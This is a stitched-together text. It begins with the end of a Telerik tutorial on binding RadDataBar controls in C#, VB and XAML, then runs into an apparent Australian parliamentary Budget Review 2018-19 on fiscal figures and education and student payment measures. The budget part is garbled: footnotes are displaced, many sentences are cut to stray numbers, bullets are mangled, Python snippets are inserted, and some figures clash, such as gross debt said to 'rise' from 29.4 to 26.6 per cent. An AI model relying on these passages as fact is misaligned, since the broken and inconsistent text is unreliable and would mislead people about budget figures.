    new Item { Val = -11, Name = "-eleven" },
    new Item { Val = -20, Name = "-twenty" },
    new Item { Val = -100, Name = "-hundred" },
};

this.DataContext = new Product()
{
    Value1 = 20,
    Value2 = 30,
    Ints = new List<int>() { 5, 6, 7, 8, 9 },
    Items = items
};
Dim items = New List(Of Item)() From {
    New Item With {.Val = 9, .Name = "nine"},
    New Item With {.Val = 10, .Name = "ten"},
    New Item With {.Val = 11, .Name = "eleven"},
    New Item With {.Val = 20, .Name = "twenty"},
    New Item With {.Val = 22, .Name = "twenty two"},
    New Item With {.Val = 90, .Name = "ninety"},
    New Item With {.Val = -9, .Name = "-nine"},
    New Item With {.Val = -10, .Name = "-ten"},
    New Item With {.Val = -11, .Name = "-eleven"},
    New Item With {.Val = -20, .Name = "-twenty"},
    New Item With {.Val = -100, .Name = "-hundred"}}

Me.DataContext = New Product() With {
    .Value1 = 20,
    .Value2 = 30,
    .Ints = New List(Of Integer)() From {5, 6, 7, 8, 9},
    .Items = items}
The only thing left to do is to create our databar(s) and bind them using the properties exposed for the purpose (as mentioned in the beginning of the article).
Example 3: Define RadDataBars
<telerik:RadDataBar Value="{Binding Value1}" />
<telerik:RadDataBar Value="{Binding Value2}" />
<telerik:RadStackedDataBar ItemsSource="{Binding Ints}" />
<telerik:RadStackedDataBar ItemsSource="{Binding Items}" ValuePath="Val" />
Note that RadDataBar doesn't have an ItemsSource property since it is a single bar and needs a single value to work.
On the other hand, RadStackedDataBar requires a collection of values - the number of items in the collection determines the number of bars that will be visualized in the stack.
When bound to a list of business objects, you should set the name of the property from the business object that will provide the value for the bars. For the purpose RadStackedDataBar and RadStacked100Databar expose the ValuePath property.
When run, this code will produce the following result.
ISSN 2203-5249
RESEARCH PAPER SERIES, 2017-18
23 MAY 2018

Budget Review 2018-19
Research Branch
Contents
The Budget as a whole
Overview ...................................................................................................................... 3
Education
School education and early learning .......................................................................... 12
Tertiary education ...................................................................................................... 15
Student payments ...................................................................................................... 19
Environment, science and energy
Environment ............................................................................................................... 22
Energy......................................................................................................................... 25
Science and technology ............................................................................................. 28
Economics and finance
Personal income tax cuts and the Medicare levy ...................................................... 31
Targeting the black economy ..................................................................................... 38
Black Economy Standing Taskforce ............................................................................ 44
Black economy measures: limits on cash payments.................................................. 47
Tobacco ...................................................................................................................... 49
Infrastructure expenditure ........................................................................................ 51
Law, justice and immigration
Legal aid and legal assistance services ....................................................................... 57
Responding to elder abuse ........................................................................................ 63
Immigration ................................................................................................................ 66
Budget Review 2018-19 2
Foreign affairs, defence and security
Foreign affairs and Official Development Assistance ................................................ 70
Defence budget overview .......................................................................................... 73
Defence capability ...................................................................................................... 76
Cyber policy ................................................................................................................ 80
National security overview ........................................................................................ 83
Health, ageing and disability
Medicare and hospital funding .................................................................................. 86
Rural health workforce .............................................................................................. 89
Medicines ................................................................................................................... 93
Mental health ............................................................................................................. 96
Aged care ................................................................................................................... 99
National Disability Insurance Scheme ...................................................................... 103
Indigenous affairs
Indigenous affairs: education, employment, and community safety ...................... 106
Indigenous affairs: health, housing and other measures ........................................ 109
Media and the arts
Funding for the national broadcasters .................................................................... 113
Public sector
Public sector efficiencies, staffing, and administrative arrangements .................... 115
Selected public sector ICT initiatives ....................................................................... 119
Data sharing and release.......................................................................................... 123
Social services and welfare
Welfare expenditure: an overview .......................................................................... 125
‘Finances for a longer life’ measures ....................................................................... 128
Veterans’ Affairs ....................................................................................................... 131
Workforce participation measures .......................................................................... 134
Extending mutual obligation—court-ordered fines and arrest warrants ................ 138
Overview
Economics Section
This brief provides an overview of the key fiscal and economic numbers from the 2018-19 Budget.
A substantial improvement in the forecast economic and fiscal position since the 2017-18 Mid-Year Economic and Fiscal Outlook (MYEFO) is due largely to upward revisions to tax receipts driven by employment and GDP growth.
The Government is now forecasting that the Budget will return to an underlying cash balance surplus of $2.2 billion (0.1 per cent of GDP) in 2019-20. This is one year earlier than was forecast in the 2017-18 MYEFO. The surplus is expected to grow to $16.6 billion (0.8 per cent of GDP) in 2021-22 and build to at least 1 per cent of GDP over the medium term.
This improved fiscal position is primarily the result of improvements in underlying economic parameters (parameter variations)—most notably higher GDP and employment forecasts, which are expected to result in higher taxation receipts and lower payments over the forward estimates period.
Additional policy decisions taken by the Government in the 2018-19 Budget are expected to have a net negative impact on the Budget over the forward estimates period, offsetting some of the improvement in the underlying fiscal position as a result of parameter variations.
Figure 1: impact of underlying parameter and policy variations since the 2017-18 MYEFO
Note: UCB = underlying cash balance
The Government’s medium-term fiscal strategy (tax receipts <23.9%)

The Government’s medium-term fiscal strategy is to achieve budget surpluses, on average, over the course of the economic cycle. The budget repair strategy is designed to deliver budget surpluses building to at least 1 per cent of GDP as soon as possible, consistent with the medium-term fiscal strategy.1
A new component of the Government’s medium-term strategy in the 2018-19 Budget is a commitment to ‘maintaining a sustainable tax burden consistent with the economic growth objective, including through maintaining the tax-to-GDP ratio at or below 23.9 per cent of GDP’.2 Taxation receipts are expected to grow to 23.9 per cent of GDP by the end of the forward estimates.
A number of commentators have questioned the economic rationale for the adoption of this ratio; noting that, in combination with the budget repair strategy, it gives the Government limited fiscal policy flexibility. As a result of these self-imposed constraints on revenue, future budget surpluses are likely to be small unless there are significant cuts to expenditure.3
Views on the economic estimates

As the improvement in the Australian Government’s fiscal position is heavily reliant on improvement in the underlying economic parameters, this outcome is subject to considerable uncertainty.
A number of commentators have remarked upon the underlying economic assumptions used in the Budget. EY and the Grattan Institute argue that the forecasts are ‘optimistic’:
The economic growth forecasts underpinning the budget are on the optimistic side. The budget projects a return to 3% trend growth, supported by an ongoing recovery in business investment, stronger household spending and a continuing public infrastructure spend. 4
[and].
5
Deloitte highlight the uncertainties about the Budget’s underlying assumptions:
The new plan may work, but it is vulnerable to economic and budgetary conditions. If the economy takes a dive, then the Budget outlook would dive alongside it. And the extended period of a promised-but-never-materialised return to surplus may linger even longer. 6
Global risks

The Government acknowledges that there are also global risks that may have a bearing on the Budget forecasts:
Globally, these risks are broadly balanced in the short term, although they are tilted to the downside in the longer term. Key risks include a faster-than-expected tightening of monetary policy, geopolitical tensions and policy uncertainty in relation to trade protectionism. More broadly, a very sharp adjustment in financial markets, which might occur from a range of factors including elevated debt levels in a number of economies, would pose a risk to both global and domestic activity.7

1. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-7.
2. Ibid.
3. D Richardson and B Browne, The arbitrary 23.9 per cent tax revenue to GDP figure: from a convenient assumption to a ‘speed limit’, Australia Institute, Briefing note, April 2018; National Australia Bank (NAB), Federal Budget 2018-19, May 2018.
4. EY, Federal Budget 2018: Punting on growth, May 2018.
5. B Coates and D Wood (Grattan Institute), ‘Budget 2018: built on good fortune, relying on luck’, Inside Story, 9 May 2018.
6. Deloitte, The intersection of politics and prudence: Australian Federal Budget 2018-19, May 2018.
Headline numbers

Economic numbers
There are a number of notable changes to the Government’s assumptions around major economic parameters since the 2017-18 MYEFO (see Table 1). These upward revisions are predominantly in the 2017-18 financial year, which means that they have cumulative effects across the forward estimates period. The changes are as follows:
⢠Real GDP growth for 2017-18 has been revised up to 2.75 per cent from 2.5 per cent.
⢠Nominal GDP growth in 2017-18 has been revised up to 4.25 per cent from 3.5 per cent (but revised down for 2018-19 by 0.25 per cent).
⢠Employment growth in 2017-18 has been revised upwards by 1 per cent to 2.75 per cent.
Government forecasts of growth in the Wage Price Index are unchanged.
Table 1: growth in key economic parameters at 2018-19 Budget relative to 2017-18 MYEFO

Outcomes Forecasts Projections
2016-17 2017-18 2018-19 2019-20 2020-21 2021-22
Real GDP 2.1 2.75 3 3 3 3
Change since MYEFO 0.1 0.25 0 0 0 n/a
Nominal GDP 5.9 4.25 3.75 4.75 4.5 4.5
Change since MYEFO 0.1 0.75 -0.25 0.25 -0.25 n/a
CPI 1.9 2 2.25 2.5 2.5 2.5
Change since MYEFO 0 0 0 0 0 n/a
Wage Price Index 1.9 2.25 2.75 3.25 3.5 3.5
Change since MYEFO 0 0 0 0 0 n/a
Employment 1.9 2.75 1.5 1.5 1.25 1.25
Change since MYEFO 0 1 0 0.25 0 n/a
Unemployment 5.6 5.5 5.25 5.25 5.25 5
Change since MYEFO 0 0 0 0 0 n/a
Sources: Australian Government, Mid-Year Economic and Fiscal Outlook 2017-18, p. 3; Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 1, p. 1-10.
The Reserve Bank of Australia has forecast year-end real GDP growth of 2.75 per cent for 2017-18, but it expects stronger growth of 3.5 per cent in 2018-19 before falling to 3.0 per cent in 2019-20.8
Fiscal numbers
The underlying cash deficit is forecast to fall to $14.5 billion (0.8 per cent of GDP) in 2018-19, with the budget returning to a surplus of $2.2 billion (0.1 per cent of GDP) in 2019-20 (see Table 2 and Figure 2).
7. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 1, p. 1-9. 8. Reserve Bank of Australia, Statement on Monetary Policy, May 2018.
Table 2: underlying cash balance

Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Underlying cash balance ($b) -18.2 -14.5 2.2 11.0 16.6 15.3
Per cent of GDP -1.0 -0.8 0.1 0.5 0.8
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-5.
Figure 2: underlying cash balance
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11, Historical Australian Government Data, Table 1, p. 11-6.
The structural budget balance—which removes those factors which have a temporary impact on revenues and expenditures—is estimated to improve from a deficit of 1.25 per cent of GDP in 2018-19 to a series of surpluses from 2020-21.
Total general government sector receipts are estimated to be $473.7 billion (24.9 per cent of GDP) in 2018-19, rising to $554.0 billion (25.5 per cent of GDP) in 2021-22 (see Table 3 and Figure 3).
Table 3: total general government sector receipts

Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Receipts ($ b) 445.1 473.7 503.7 525.5 554.0 2 056.8
Per cent of GDP 24.3 24.9 25.3 25.2 25.5
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-10.
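The per-cent-of-GDP figures quoted throughout can be cross-checked by backing out the nominal GDP each table implies. This is a rough consistency sketch using the rounded published figures, not an official calculation (the budget papers publish GDP estimates separately):

```python
# Back out implied nominal GDP (in $b) from the 2018-19 figures in
# Tables 3 and 4. Because the published percentages are rounded to
# one decimal place, the two implied GDP values agree only roughly.
receipts, receipts_pct = 473.7, 24.9   # Table 3: receipts, % of GDP
payments, payments_pct = 484.6, 25.4   # Table 4: payments, % of GDP

gdp_from_receipts = receipts / (receipts_pct / 100)
gdp_from_payments = payments / (payments_pct / 100)

# Both imply nominal GDP of roughly $1.9 trillion for 2018-19.
print(round(gdp_from_receipts, 1), round(gdp_from_payments, 1))  # prints: 1902.4 1907.9
```

The two implied values differ by well under 1 per cent, which is consistent with rounding in the published ratios rather than any inconsistency between the tables.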
Figure 3: payments and receipts
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11: Historical Australian Government Data, Table 1, p. 11-6.
Tax receipts are estimated to be $440.5 billion (23.1 per cent of GDP) in 2018-19 and $465.5 billion (23.3 per cent of GDP) in 2019-20, increasing to a projected $519.6 billion (23.9 per cent of GDP) by 2021-22. This projection is consistent with the updated medium-term fiscal strategy, which includes the maintenance of a tax-to-GDP ratio at or below 23.9 per cent of GDP.
General government sector payments are estimated to fall as a share of GDP, from 25.4 per cent of GDP in 2018-19 to 24.7 per cent of GDP in 2021-22 (see Table 4 and Figure 3).
Table 4: general government sector payments

Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22 Total
Payments ($b) 459.9 484.6 497.5 514.5 537.3 2 034.0
Per cent of GDP 25.1 25.4 25.0 24.7 24.7
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-10.
General government net capital investment is expected to be $4.9 billion in 2018-19 (0.3 per cent of GDP), $4.8 billion higher than net capital investment in 2017-18. This change is due to funding associated with the implementation of the 2016 Defence White Paper.9 Over the four years to 2021-22, net capital investment in defence is projected to total $25.3 billion. Net capital investment in almost all other functions is projected to decline.10
9. Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 6, p. 6-46. 10. Ibid., Table 20, p. 6-48.
General government sector net debt is estimated to reach 18.4 per cent of GDP in 2018-19, before falling to 14.7 per cent of GDP in 2021-22. It is projected to continue falling to 5.2 per cent of GDP by 2027-28 (see Table 5 and Figure 4).11
Table 5: net and gross debt

Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22
Net debt ($b) 341.0 349.9 344.0 334.3 319.3
Per cent of GDP 18.6 18.4 17.3 16.1 14.7
Gross debt ($b) 533.0 561.0 579.0 566.0 578.0
Per cent of GDP 29.0 29.5 29.0 27.2 26.6
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11, p. 11-12 and p. 11-14.
Figure 4: net debt
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 11: Historical Australian Government Data, Table 4, p. 11-12.
Gross debt (the face value of Commonwealth Government Securities (CGS) on issue) is projected to rise from 29.4 per cent of GDP in 2018-19 to 26.6 per cent of GDP by the end of the forward estimates, before falling to $532 billion by 2028-29 (see Table 5).12
General government sector net interest payments are estimated to fall from $14.5 billion (0.8 per cent of GDP) in 2018-19 to $12.2 billion (0.6 per cent of GDP) in 2019-20, remaining at 0.6 per cent of GDP up to 2021-22 (see Table 6).13
11. Ibid., Statement 11, p. 11-12. 12. Ibid., Statement 3, p. 3-16.
Net financial worth, an indicator of fiscal sustainability, has improved over the forward estimates relative to the 2017-18 MYEFO. It is estimated to be -25.4 per cent of GDP in 2018-19, improving marginally to -24.2 per cent of GDP in 2019-20. Another component of the medium-term fiscal strategy is ‘improving net financial worth over time’. Government projections suggest that net financial worth will be 7.5 per cent of GDP by 2028-29.14
Table 6: net financial worth and net interest payments

Actual Estimates Projections
2017-18 2018-19 2019-20 2020-21 2021-22
Net interest payments ($ billion) 13.1 14.5 12.2 12.4 12.2
Per cent of GDP 0.7 0.8 0.6 0.6 0.6
Net financial worth ($ billion) -466.3 -482.9 -482.1 -471.3 -453.9
Per cent of GDP -25.4 -25.4 -24.2 -22.6 -20.9
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Statement 3, p. 3-16.
Key revenue and expense measures
Table 7 lists the major revenue measures—and Table 8, the major expense measures—with a significant impact in the 2018-19 Budget.
Table 7: major policies—revenue measures
2017-18 ($m) 2018-19 ($m) 2019-20 ($m) 2020-21 ($m) 2021-22 ($m) Total ($m)
Personal Income Tax Plan - -360 -4 120 -4 420 -4 500 -13 400
Personal Income Tax - retaining the Medicare levy rate at 2 per cent
- -400 -3 550 -4 250 -4 600 -12 800
Black Economy Package - Combatting Illicit Tobacco
- -15 3 251 148 193 3 577
Better targeting the Research and Development Tax Incentive - 314 641 764 719 2 438
Black Economy Package - New and enhanced ATO enforcement against the Black Economy
- 340 467 533 578 1 917
Personal Income Tax - ensuring individuals meet their tax obligations
- 180 258 277 277 991
Protecting Your Super Package - changes to insurance in superannuation
- - 224 228 245 697
A firm stance on tax and superannuation debts
- -149 -152 -156 -160 -617
13. Ibid.
14. Ibid., p. 3-17.
Black Economy Package - further expansion of taxable payments reporting
- -4 47 264 299 606
Superannuation - better integrity over deductions for personal contributions
- 89 109 110 120 427
Source: Australian Government, Budget Measures: budget paper no. 2: 2018-19, Table 1, pp. 1-6.
Table 8: major policies—expense measures

2017-18 ($m) 2018-19 ($m) 2019-20 ($m) 2020-21 ($m) 2021-22 ($m) Total ($m)
Supporting Our Hospitals - National Health Agreement - public hospital funding
- -50 - -331 -597 -977
Pharmaceutical Benefits Scheme - new and amended listings -17 -175 -221 -255 -102 -770
Great Barrier Reef 2050 Partnership Program
-444 -10 -5 -8 -11 -478
Remote Indigenous Housing in the Northern Territory - -110 -110 -110 -110 -440
National Research Infrastructure Investment Plan - implementation of Government response
-199 -6 -26 -76 -87 -393
Funding to Boost Services in the Northern Territory -260 - - - - -260
More Choices for a Longer Life - finances for a longer life 0 -21 -93 -75 -70 -259
Managing the Skilling Australians Fund - revised implementation arrangements
-250 - - - - -250
National School Chaplaincy Programme - continuation
- -62 -62 -62 -62 -247
Building Better Regions Fund - round three - -40 -108 -48 -10 -207
Source: Australian Government, Budget Measures: budget paper no. 2: 2018-19, Table 2, pp. 47-68.
Revenue 2018-19
$b Percentage
Personal income tax 222.9 45.9
Company & resource rent taxes 92.6 19.0
Sales tax (incl. GST) 72.1 14.8
Fuels excise 19.5 4.0
Other taxes 44.9 9.2
Non-tax revenue 34.1 7.0
Total 486.1 100.0
Figure 5: revenue in 2018-19
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Budget overview, 8 May 2018, Statement 6, Appendix A, p. 6-50.
Government expenses by function 2018-19
Function $b Percentage
Social security and welfare 176.0 36.0
Health 78.8 16.1
Education 34.7 7.1
Defence 31.2 6.4
General public services 23.1 4.7
All other functions 46.8 9.6
Other purposes 98.0 20.0
Total 488.6 100.0
Figure 6: expenses by function
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, Budget overview, 8 May 2018, Statement 5, Table 10, p. 5-21.
School education and early learning
Marilyn Harrington
School funding expenditure
The 2018-19 Budget embeds the new school funding arrangements that were put in place by the 2017-18 Budget and later modified through the passage of the Australian Education Amendment Act 2017.15 The increased funding for these later changes for the years 2017-18 to 2020-21 was provided in the Mid-year Economic and Fiscal Outlook 2017-18.16.17.18
Indexation of base per student funding).
The National School Chaplaincy Programme.20
15..
16. S Morrison (Treasurer) and M Cormann (Minister for Finance), Mid-year economic and fiscal outlook 2017-18, p. 146.
17. The budget figures in this article have been taken from the following document unless otherwise sourced: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19.
18. Australian Government, Final budget outcome 2012-13, p. 95.
19. Information about indexation arrangements is from M Harrington, Australian Education Amendment Bill 2017, op. cit., p. 10.
20. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 92; S Birmingham (Minister for Education and Training) and K Andrews (Minister for Vocational Education and Skills), Guaranteeing essential services—reform and investment for better education opportunities, media release, 8 May 2018; Australian Government, Budget 2018-19: budget overview, p. 34.
21. S Morrison (Treasurer), Budget speech 2018-19, p. 11.
22. Birmingham and Andrews, op. cit.
23. T Plibersek (Shadow Minister for Education and Training), Biggest threat to public schools: Liberals’ massive cuts, media release, 20 March 2018.
24. National Catholic Education Commission (NCEC), Budget doesn’t address Catholic schools’ concerns, media release, 9 May 2018; R Urban and R Deutrom, ‘Catholic backlash builds as funding concerns sidestepped’, The Australian, 10 May 2018.
25. Independent Schools Council of Australia, Chaplaincy program extension welcomed, media release, 9 May 2019; NCEC, op. cit.; P Karp, ‘School chaplain program’s $247m budget extension rejected by teachers’ union’, The Guardian, 9 May 2018.
26. Australian Education Union, Turnbull’s Budget fails our children, media release, 8 May 2018.
27. Department of Education and Training (DET), ‘Review to Achieve Educational Excellence in Australian Schools’ and ‘Independent Review into Regional, Rural and Remote Education’, DET websites.
28. DET, ‘Review of the socio-economic status (SES) score methodology’, DET website.
29. S Birmingham (Minister for Education and Training), Preschool funding boost, media release, 3 February 2018.

Moreover, the Treasurer in his budget speech announced that it would be funded on a ‘permanent basis’.21

The Government has also announced that the program will have a new focus—school chaplains will be required to upgrade their skills by undertaking cyber-bullying training provided by the eSafety Commissioner.22

Budget reaction.23 The National Catholic Education Commission (NCEC) is also disappointed that the Budget has not addressed its concerns, particularly in relation to the various reviews that have been undertaken (see below).24

The NSCP’s renewal has been welcomed by the non-government schools sector, but criticised by various secular groups.25 The Australian Education Union argues that the funds should have been used instead for ‘professional school counselling services, ongoing professional development for principals and teachers and student well being programs’.26

The future of school funding
The Budget does not contain any school education measures as a result of the recent Gonski review which examined school reform or the Review into Regional, Rural and Remote Education.27.28.

Early learning
The extension of the National Partnership Agreement Universal Access to Early Childhood Education (the NP), which was first announced in February this year, is the most significant of the early learning budget measures.29 The NP, which provides funding for preschool programs for children in the year before full-time school, has once again been extended by one year only. The Government is providing $441.6 million over two years from 2018-19 to extend the NP for the 2019 calendar year and to undertake the National Early Childhood and Care Collection in early 2020.30
This yearly extension of the NP has been the practice since 2015 in spite of continuing concerns by the early childhood education sector about the uncertainty that this creates—there are also calls for the NP to be extended to three-year-olds.31 The Shadow Minister for Early Childhood Education and Development, Amanda Rishworth, has warned that funding uncertainty may mean ‘fees will have to rise or services will have to close’.32.33
None of the budget measures discussed in this article require separate legislation.
30. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 91.
31. For example: Early Childhood Australia, Missed opportunity on quality early learning, media release, 8 May 2018; Mitchell Institute, Funding announcement hurts preschools, media release, 5 February 2018.
32. A Rishworth (Shadow Minister for Early Childhood Education and Development), Budget leaves families in limbo without funding certainty, media release, 9 May 2018.
33.
Tertiary education
Hazel Ferguson
This is not a major budget for tertiary education. However, the Government has addressed a number of outstanding issues arising from earlier announcements in both vocational education and training (VET) and higher education.
Vocational education and training
The most significant 2018-19 budget measure in VET addresses the future of the apprenticeship-focused Skilling Australians Fund (SAF), which was announced in the 2017-18 Budget, but has not yet been implemented.34
Skilling Australians Fund announcement: 2017-18 Budget
In the 2017-18 Budget, the Government announced a four-year National Partnership Agreement worth approximately $1.5 billion, to replace the expired National Partnership Agreement on Skills Reform.35 The new Agreement was funded from 2017-18, subject to negotiations with the states and territories. However, funding for the measure was based on revenue from a levy on skilled visas from March 2018, which is yet to commence.36 The legislation to give effect to the levy passed Parliament on 9 May 2018.37
With the National Partnership Agreement on Skills Reform having expired on 30 June 2017, skills training providers have raised concerns about the delay in implementing the SAF and uncertainty about the stability of revenue from the levy.38 This has been particularly pressing given declining apprenticeship numbers and trade skill shortages in recent years.39
2018-19 budget measure—‘Managing the Skilling Australians Fund’
The 2018-19 Budget makes a number of changes to manage the delayed implementation of the SAF:
⢠$250.0 million is provided in 2017-18, to allow the SAF to commence
⢠an additional $50.0 million is available each year from 2017-18 to 2021-22, to be shared between states and territories—the first year is only available to those that sign on to participate in the SAF by 7 June 2018 and
⢠the proposed Agreement with the states and territories will be delayed by one year, shifting the four-year Agreement from 2017-18 to 2020-21, to 2018-19 to 2021-22.40
The total value of the SAF remains the same as in the 2017-18 budget announcement (although running over five years rather than four), at approximately $1.5 billion.41 However, the funding for 2017-18 will not be included in the Agreement, leaving total funding for the National Partnership on the Skilling Australians Fund at $1.2 billion.42.43

34. Information on the Skilling Australians Fund (SAF) is available from Department of Education and Training (DET), ‘Skilling Australians Fund’, DET website.
35. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35.
36. Migration Amendment (Skilling Australians Fund) Bill 2018.
37. At the time of writing, these bills, the Migration Amendment (Skilling Australians Fund) Bill 2018, and Migration (Skilling Australians Fund) Charges Bill 2017, are yet to receive Royal Assent.
38.
39. As discussed in C Petrie, H Ferguson and H Sherrell, Migration Amendment (Skilling Australians Fund) Bill 2017 and Migration (Skilling Australians Fund) Charges Bill 2017, Bills digest, 76, 2017-18, Parliamentary Library, Canberra, 2018, pp. 5-6.
40. Australian Government, Budget 2018-19: budget overview, 2018, Appendix C: major initiatives, p. 34; Australian Government, ‘Part 2: expense measures’, Budget measures: budget paper no. 2: 2018-19, p. 90.
41. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35; Australian Government, Federal financial relations: budget paper no. 3: 2018-19, p. 35.
In the 2017-18 Budget, total funding available through the SAF in 2017-18 was $350.0 million, with only $90.0 million of this coming from revenue from the levy. 44 Therefore, while the 2018-19 Budget makes available $300 million in 2017-18, it does not appear that this whole amount is new spending.
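The moving parts of the SAF funding described above can be laid out as simple arithmetic. This is an illustrative back-of-the-envelope sketch using the rounded dollar figures quoted in this section, not an official costing:

```python
# SAF funding arithmetic from the figures quoted above (all amounts in $m).
total_saf = 1500            # approximate total value of the SAF
commence_2017_18 = 250      # provided in 2017-18 to allow the SAF to commence
extra_shared = 50           # additional amount shared between states and territories
made_available = commence_2017_18 + extra_shared   # the $300m made available in 2017-18

# The 2017-18 funding sits outside the Agreement, leaving roughly
# $1.25b for the National Partnership (reported, rounded, as $1.2b).
agreement_total = total_saf - commence_2017_18

# Under the 2017-18 Budget announcement, only part of the 2017-18
# funding depended on skilled-visa levy revenue.
available_2017_18 = 350     # total available through the SAF in 2017-18
from_levy = 90              # portion expected from the levy
from_other_sources = available_2017_18 - from_levy  # $260m not levy-dependent

print(made_available, agreement_total, from_other_sources)  # prints: 300 1250 260
```

The gap between the $300 million made available in 2017-18 and the $90 million of expected levy revenue is why the measure is not entirely new spending.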
The full implementation of the SAF remains subject to negotiation with the states and territories.
Higher education
The Mid-year Economic and Fiscal Outlook 2017-18 (MYEFO) addressed the major outstanding funding issue in higher education by announcing that unlegislated reform measures from the 2017-18 Budget would not be pursued.45 Unlike these recent higher education reform announcements, the most significant MYEFO saving was achieved without legislation, through a 2018 and 2019 freeze on funding for Commonwealth Supported Places (CSPs).46 CSPs provide subsidised higher education courses for domestic students, primarily at undergraduate level. The challenge in higher education in this budget has therefore been in balancing strategic growth in some areas, particularly regional universities, against the overall pause in demand-driven funding.
Response to the Review into Regional, Rural and Remote Education
The 2018-19 Budget provides $96.1 million over four years from 2018-19 to implement the Government’s response to the higher education components of the Review into Regional, Rural and Remote Education.47.48 According to the Department of Education and Training (DET), Regional Study Hubs (RSHs) will ‘provide infrastructure such as study spaces, video conferencing, computing facilities and internet access, as well as pastoral and academic support for students studying via distance at partner universities.’49 The response also includes $53.9 million for expanded access to Youth Allowance, which is discussed elsewhere in the Budget Review 2018-19.50 The Regional Universities Network has supported the Government’s response but ‘looks forward to a further Government response to the Halsey review recommendations’.51 There is no response, for instance, to the Review’s recommendations to expand the affordability and availability of VET in the regions.52

42. Australian Government, Federal financial relations: budget paper no. 3: 2017-18, p. 35; Australian Government, Federal financial relations: budget paper no. 3: 2018-19, p. 35; Department of Education and Training (DET), Skilling Australians Fund, fact sheet, DET website, 2018.
43. H Sherrell, ‘Immigration overview’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
44. Australian Government, Portfolio budget statements 2017-18: budget related paper no. 1.5: Home Affairs Portfolio, p. 15.
45. Australian Government, Mid-year Economic and Fiscal Outlook 2017-18 (MYEFO), pp. 143-4.
46.
47. Australian Government, ‘Part 2: expense measures’, op. cit., p. 94.
48. Ibid., pp. 81-82; DET, ‘Access and Participation’, DET website.
Other support for regional universities.53
No additional funding for medical CSPs is committed in the Education and Training Portfolio for this measure, although a new pool of medical CSPs is being created from 2021.54 Instead, places are being made available through partnerships with universities which already have medical places allocated. More information on the Stronger Rural Health Strategy, including the Murray-Darling medical schools network, is available elsewhere in the Budget Review 2018-19.55
Cost recovery and regulation.56
The new TEQSA charge offsets the cost of an
additional $24.3 million over four years from 2018-19 for TEQSA to manage increased workload resulting from growth in provider applications, and to address contract cheating.57 Innovative Research Universities, while welcoming the Budget overall, is ‘disappointed with “pointless” new
university charges’.58.59 The Budget
49. DET, op. cit. 50. M Klapdor, ‘Student payment changes’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 51. Regional Universities Network (RUN), RUN: budget a step in the right direction for regional students and universities, media
release, 8 May 2018. 52. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.5: Education and Training Portfolio, p. 10; J Halsey, Independent Review into Regional, Rural and Remote Education, Department of Education and
Training, Canberra, 2018, p. 56. 53. Australian Government, ‘Part 2: expense measures’, op. cit., p. 106. 54. DET, ‘A pool of medical Commonwealth supported places (CSPs) to support innovative medical initiatives’, DET website. 55. M Biggs, ‘Rural health workforce’, Budget Review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra,
2018.
56. DET, ‘HERI Budget overview 18-19’, DET website. 57. Australian Government, ‘Part 2: expense measures’, op. cit., p. 95. 58. Innovative Research Universities, IRU welcomes budget investment in research but disappointed with 'pointless' new university charges, media release, 9 May 2018. 59. Australian Skills Quality Authority (ASQA), ‘Fees and Charges’, ASQA website.
commits $18.6 million over four years from 2018-19 to support ASQA to move to full cost recovery. This is estimated to achieve $52.7 million in revenue, or a net saving of $34.1 million.60
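The net saving cited here is simply the estimated cost-recovery revenue offset against the additional funding for ASQA; a minimal sketch checking the arithmetic (figures in $ millions over four years, as quoted in the text):

```python
# Figures in $ millions over four years from 2018-19, as cited in the budget measure.
asqa_funding = 18.6        # additional funding for ASQA's move to full cost recovery
estimated_revenue = 52.7   # estimated cost-recovery revenue over the same period

net_saving = estimated_revenue - asqa_funding
print(f"Net saving: ${net_saving:.1f} million")  # Net saving: $34.1 million
```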
An additional $1.0 million in 2018-19 has also been allocated to the Office of the Commonwealth Ombudsman to support the workload of the VET Student Loans Ombudsman in managing and investigating student complaints about VET FEE-HELP and VET Student Loans providers.61
Legislation would be required to apply new charges to providers.
60. Australian Government, ‘Part 2: expense measures’, op. cit., p. 85. 61. Australian Government, ‘Part 2: expense measures’, op. cit., p. 96.
Student payments
Michael Klapdor
The 2018-19 Budget includes a number of measures to increase assistance to Indigenous students and students from regional and rural areas and to prevent students from accessing student payments if they are undertaking courses not approved for the Higher Education Loan Program (HELP).
50 years of ABSTUDY
The Budget includes a $38.1 million measure over four years to provide additional assistance to Indigenous secondary school students who receive assistance through the Aboriginal and Torres Strait Islander Assistance Scheme (ABSTUDY) program.62 The ABSTUDY program assists Aboriginal or Torres Strait Islander students and apprentices where they need to travel for study.63.64 The grants scheme was initially limited to tertiary students. A scheme for secondary students was introduced from 1970 and the two were amalgamated into ABSTUDY in 1988.65 The measure will:
⢠combine the boarding supplement rate with the Living Allowance at the Away from Home rate for all ABSTUDY recipients under 16 years of age—rates will increase by around $5,258.60 per year for almost 1,900 students
